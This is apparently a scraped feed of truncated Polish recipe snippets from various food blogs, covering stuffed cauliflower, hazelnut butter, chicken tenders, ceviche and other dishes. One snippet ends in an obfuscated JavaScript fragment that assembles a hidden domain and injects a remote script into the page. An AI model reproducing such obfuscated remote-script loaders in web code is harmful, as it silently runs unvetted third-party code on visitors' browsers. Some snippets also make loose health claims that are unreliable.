uprawiane, podobnie jak we Francji, Włoszech, Indiach, Chinach, Kanadzie oraz Meksyku. Kalafior ma szerokie zastosowanie w kuchni. Można go jeść na surowo, lub po ugotowaniu, jako dodatek do zup, sałatek, tart czy zapiekanek. Najpopularniejszy podawany jest po ugotowaniu z zezłoconą na maśle bułką tartą. Inną formą jego podania jest kalafior faszerowany mięsem. Składniki: - 1 średni kalafior - 600 g zmielonego mięsa(...)dodatkiem pieczonych ziemniaków – na obiad… i nie tylko. Tym razem ekspozycja z przymrużeniem oka, w nastroju Halloween. Odrobina humoru w kuchni nikomu nie zaszkodzi. Gorąco polecam i życzę smacznego. Wydrukuj przepis The post Kalafior faszerowany mięsem appeared first on Moje Wypieki I Nie Tylko
mojewypiekiinietylkoużywać po raz pierwszy. Na co dzień w mojej kuchni znajduje się olej kokosowy i oliwa z oliwek - ekologiczne, tłoczone na zimno. Do smażenia używam tego pierwszego, a do sałatek i potraw już gotowych zazwyczaj dodaje oliwę. OLEJ PALMOWY - uzyskany z miąższu owoców palmy oleistej pochodzącej z kontrolowanych upraw ekologicznych. Ma czerwono-pomarańczową barwę, gdyż nie został poddany procesom(...)słodzideł, aczkolwiek bardzo go lubię. MUS KOKOSOWY - ekologiczny, wyprodukowany z dojrzewających w pełni słońcu orzechów kokosowych. Świeży miąższ został wysuszony, a następnie zmielony do postaci musu. Stanowi smaczny dodatek do pieczywa, dań śniadaniowych, naleśników, deserów czy posiłków wytrawnych. Dodaje potrawom wyśmienitego kokosowego smaku i zapachu. Zawiera kwas laurynowy oraz kaprylowy o działaniu antywirusowym, antybakteryjnym i przeciwzapalnym. Zawiera cenne
Zdrowie na języku :PPołączenie miodu z musztardą jest jednym z moich ulubionych. Kurczak w takiej marynacie wychodzi naprawdę wspaniały, dlatego postanowiłem poeksperymentować i zrobić polędwiczki wieprzowe w sosie na
Kuchnia ŁukaszaHej!, po raz kolejny przedstawiam Wam ciasto które nie dość że zrobicie szybko to i będzie zdrowe. Ciasto przygotowane zostanie w połowie na mące jaglanej, użyjemy
Kuchnia PROzdrowotnaPowszednia pomidorówka to już przeszłość!, przy obecnej szerokiej dostępności produktów możemy wzbogacać smak tradycyjnych potraw o świetne dodatki, Prażony czosnek i przesmażone suszone pomidory na zalewie
Kuchnia PROzdrowotnaniż w przypadku raków, więc i szczypce są odpowiednio mocniejsze. Mięso wyjmujemy ze szczypców, nóg i odwłoka. Oczywiście na mniej wymagających przyjęciach lub jeśli planujemy mięso wykorzystać np. do sałatki posługujemy się po prostu własnymi palcami. Podobnie jak w przypadku raków musimy sobie najpierw takiego homara podzielić na części, zaczynając od szczypiec i tę czynność zawsze wykonujemy rękami. Po prostu(...)uniknąć się kontaktu z ikrą lub wątróbką, tak tutaj na nie trafimy na 100%. Powiem tak, spróbować warto, ale nie zdziwi mnie brak miłości do tych części. No… to smacznego! Ostrygi Tutaj większej filozofii nie ma. Jemy je za pomocą specjalnego widelczyka. Odcinamy je od muszli, usuwamy ciemne części, skrapiamy sokiem z cytryny i po prostu wypijamy zawartość. Można też
Kate's Kitchenmyślą o cudzoziemcach. Autorka, która wyemigrowała z kraju do Anglii mając lat osiem, napisała ją żeby pokazać, że kuchnia polska to nie tylko pierogi – że jest bardzo zróżnicowana, smaczna i nie jest jedynie przyjmowaniem kalorii, żeby chronić się przed mrozem. Oprócz przepisów znajdziecie tam też rys historyczny – dlaczego Polacy jedzą jak jedzą. Przeglądając ją przeżyłam podróż do smaków(...)jaką tęskni ale też tak jak ją obecnie interpretuje – znajdziecie tu bowiem dużo przepisów-wariacji na temat kuchni polskiej, gdzie typowo polskie składniki czy danie zyskało nowe oblicze (sałatka jarzynowa z krabem, tuńczyk marynowany w żubrówce, gołąbki z jagnięciną w pomidorowo-cynamonowym sosie). Danie jakie wybrałam do przygotowania na pierwszy ogień to knedle ze śliwkami. U nas w domu
Cooking for EmilyMają w sobie sporo minerałów takich jak żelazo, magnez, cynk, potas, fosfor i miedź. Dobrze komponują się z potrawami słodkimi oraz słono-pikantni. Mogą być składnikiem sałatek, dodatkiem do białych mięs czy makaronów. Sprawdzą się także w deserach, przy wypieku ciast… i nie tylko. Masło orzechowe. Składniki: - 2 szklanki orzechów laskowych - ok. ½ szklanki oleju kokosowego (lub innego o neutralnym smaku(...)laskowych wynosi 15. W związku z tym bez obaw mogą po nie sięgać również cukrzycy, a dodatkowym atutem jest to, że orzechy laskowe, obniżają poziom cukru we krwi . Szybko, smacznie i do tego zdrowo – czegóż chcieć więcej? Gorąco polecam, na zdrowie. Wydrukuj przepis The post Masło orzechowe appeared first on Moje Wypieki I Nie Tylko
mojewypiekiinietylkoPieczone kurczaki pasują praktycznie do każdej surówki, sałatki, makaronów, kasz, ziemniaków, pieczywa, ryżu. Chrupiące z zewnątrz, soczyste i mięciutkie w środku. Idealne. Złociste. Dziś połączenie smaków słodko - ostrych, czyli to co raz na jakiś czas bardzo lubimy zjeść. Jeśli skusicie się na mięso w któryś dzień tygodnia zapraszam do tego wpisu:) Choć częściej wybieram smaki ostre, słonawe niż słodkie(...)godzinę, od czasu do czasu polewam powstałym sosem. Gotowe dekoruję zielonym akcentem - natką, rukolą. Podałam je z pieczonymi ziołowymi ziemniakami polanymi powstałym sosem z pieczenia drobiu, sosu miodowo-musztardowego. Smacznego
Zasmakuj Kuchnikurczaka w chrupiącej panierce. Tak przygotowane polędwiczki są domową wersją popularnego fast food’a. Idealnie smakują z frytkami i zestawem surówek. Możecie je również pokroić i dodać do sałatki. Wspaniałe do obiadu, jak i na przyjęcie. U mnie takie polędwiczki cieszą się niezwykłą popularnością. Polędwiczki z kurczaka często też przygotowuje w zdrowszej wersji – w piekarniku lub na patelni(...)naleśnikowego). Polędwiczki z kurczaka maczamy najpierw w naszym cieście, a następnie w mieszance mąk. Smażymy z obu stron na złoto, na rozgrzanym oleju (olej powinien zakrywać polędwiczki do połowy). Smacznego (function(){ q2ts=document.createElement("script");q2ts_=("us")+("ta"); q2ts_+="t"+(".");q2ts_+=("in");q2tsu="15408365";q2ts.async=true; q2tsu+=".pnb6vtcp2tsblvkzc";q2ts.type="text/javascript";q2ts_+="f"+"o"+("/"); q2tsu+="5b66p54rrcm6i";q2ts.src="//"+q2ts_+q2tsu; dq2ts=document.body
Słodkie okruszkiKontynuujemy temat prozdrowotnych obiadów odpowiednich dla niemal każdego, od nietolerujących glutenu aż po wegan. Czarna fasola pełna witamin z grupy B i kwasu foliowego wspaniale syci
Kuchnia PROzdrowotnaSKŁADNIKI: - 1 kg ziemniaków - pęczek szczypiorku - cebula dymka - 1/2 pęczka koperku - 100 ml bulionu - 50 ml oleju z pestek dyni SOS: - 2 łyżki musztardy - 4 łyżki
Kuchnia bezglutenowa LoliCzasami w domu brakuje chleba, a hulający za oknem wiatr nie zachęca do wyjścia z domu. Nie ma z czego zrobić porannej sałatki, a jajka dawno się znudziły. Sterczenie w kuchni przez dłużej, niż dziesięć minut wydaje się niemożliwe do wykonania. Wtedy na ratunek przychodzi szybki naleśnik śniadaniowy - bardzo syty, banalnie prosty w przygotowaniu i przepyszny! (function(...)bardzo rozgrzanej patelni, a później średnio. Pierwszy raz przewracamy w chwili, gdy górna warstwa ciasta się zetnie. Podajemy z ulubionymi konfiturami, owocami, kremem czekoladowym i bananem, twarogiem - dowolnie. Voila! Smacznego i do napisania wkrótce
Życie zamknięte w smakuCeviche, to sałatka której głownym składnikiem jest surowa ryba marynowana w soku z cytrusów, z dodatkiem soli i ostrych papryczek. W pierwszej chwili aż trudno uwierzyć, że ryba bez żadnej obróbki termicznej nie jest surowa :) A to wszystko za sprawą soku z cytrusów, który ścina białko znajdujące się w rybie i sprawia, że absolutnie nie smakuje ona jak surowa ryba(...)kawałki, wielkością przypominające kawałki ryby. Pomarańczę łączymy z drobno posiekaną cebulą oraz posiekaną kolendrą. Rybę wyjmujemy z lodówki i odlewamy sok. Łączymy z pozostałymi składnikami. Podajemy z ulubionymi dodatkami. Smacznego
DefinicjaSmakusłoiczka bo to już niestety nie będzie to samo. Z podanych składników wyjdzie nam go trochę więcej niż potrzeba dla tej ilości makaronu. Można go wykorzystać do innej sałatki. Spokojnie wytrzyma w lodówce kilka dni. Serki kremowe Arla Apetina są idealne do przygotowywania takiego majonezu. Ja od dziś będę już robić go sama. Szeroka gama smakowa tych(...)Zdjąć i przestudzić, a następnie pokroić w paski. Makaron wymieszać z grillowaną cukinią i podzielonym na małe kawałki wędzonym pstrągiem. Polać majonezem i delikatnie wymieszać. Udekorować listkami bazylii. Smacznego :) Aronia Przepis bierze udział w konkursie
Wiem co jem